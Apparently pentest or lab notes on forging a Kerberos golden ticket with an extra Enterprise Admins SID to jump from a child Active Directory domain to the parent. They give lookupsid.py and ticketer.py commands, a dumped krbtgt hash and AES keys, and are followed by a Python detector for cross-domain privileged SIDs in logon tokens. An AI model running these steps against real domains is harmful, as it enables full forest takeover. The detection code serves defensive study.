Golden Ticket

Step 1: Get Child Domain SID

lookupsid.py internal.zsm.local/"melissa"@192.168.210.16

Domain SID is: S-1-5-21-3056178012-3972705859-491075245

Step 2: Get Parent Domain SID and RID for the Enterprise Admins group

lookupsid.py internal.zsm.local/"melissa"@192.168.210.10 | grep -B12 "Enterprise Admins"

Domain SID is: S-1-5-21-2734290894-461713716-141835440
519: ZSM\Enterprise Admins (SidTypeGroup)

Step 3: Get the AES key for KRBTGT account on internal.zsm.local

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16

Step 4: Get the RID for the user melissa (who is now a member of the Domain Admins group in internal.zsm.local)

wmic useraccount where name="melissa" get sid

S-1-5-21-3056178012-3972705859-491075245-6603

Step 5: Forge Golden Ticket

ticketer.py -aesKey 3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0 -domain internal.zsm.local -domain-sid S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -user-id 6603 melissa

Step 6: Add the ticket into the env variable

export KRB5CCNAME=melissa.ccache

Step 7: Confirm with klist

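Added defender-side example, not part of the original notes: the forged ticket above only grants parent-domain rights because the parent's Enterprise Admins SID (RID 519) rides along in the child user's SID history. The Python below flags any logon record whose group SIDs include a well-known privileged RID from a domain other than the user's own; the SID values are the ones on this page, the logon record is constructed, and the function and constant names are my own.

```python
from __future__ import annotations
import re

# Well-known RIDs of the privileged AD groups; identical in every domain/forest.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Only domain SIDs (S-1-5-21-<3 subauthorities>-<RID>) carry a domain identity.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")


def split_sid(sid: str) -> tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into (domain prefix, RID); reject non-domain SIDs."""
    if not DOMAIN_SID_RE.match(sid):
        raise ValueError(f"not a domain SID: {sid}")
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def foreign_privileged_sids(user_sid: str, group_sids: list[str]) -> list[tuple[str, str]]:
    """Return (sid, group name) for each privileged group whose domain differs from the user's.

    A same-domain Domain Admins SID is normal; a *different* domain's 512/518/519 in the token
    of a child-domain user is the signature of SID-history injection (the -extra-sid above).
    """
    user_domain, _ = split_sid(user_sid)
    hits = []
    for group in group_sids:
        try:
            group_domain, rid = split_sid(group)
        except ValueError:
            continue  # BUILTIN and other non-domain SIDs cannot be cross-domain history
        if group_domain != user_domain and rid in PRIVILEGED_RIDS:
            hits.append((group, PRIVILEGED_RIDS[rid]))
    return hits


# Constructed logon record: the child-domain user from this page, with the group SIDs a
# SIEM would extract from the logon's group-membership audit data.
SAMPLE_LOGON = {
    "user_sid": "S-1-5-21-3056178012-3972705859-491075245-6603",
    "group_sids": [
        "S-1-5-21-3056178012-3972705859-491075245-513",  # Domain Users, same domain
        "S-1-5-21-3056178012-3972705859-491075245-512",  # Domain Admins of the child, same domain
        "S-1-5-32-545",                                  # BUILTIN\Users, not a domain SID
        "S-1-5-21-2734290894-461713716-141835440-519",   # parent-domain Enterprise Admins
    ],
}

if __name__ == "__main__":
    for sid, name in foreign_privileged_sids(SAMPLE_LOGON["user_sid"], SAMPLE_LOGON["group_sids"]):
        print(f"ALERT: cross-domain privileged SID {sid} ({name}) in logon token")
```

The same check applied to 4769/4624-style data at the parent domain's DCs catches the ticket regardless of which KRBTGT key was used to forge it, because the injected SID has to be presented to the parent to be useful.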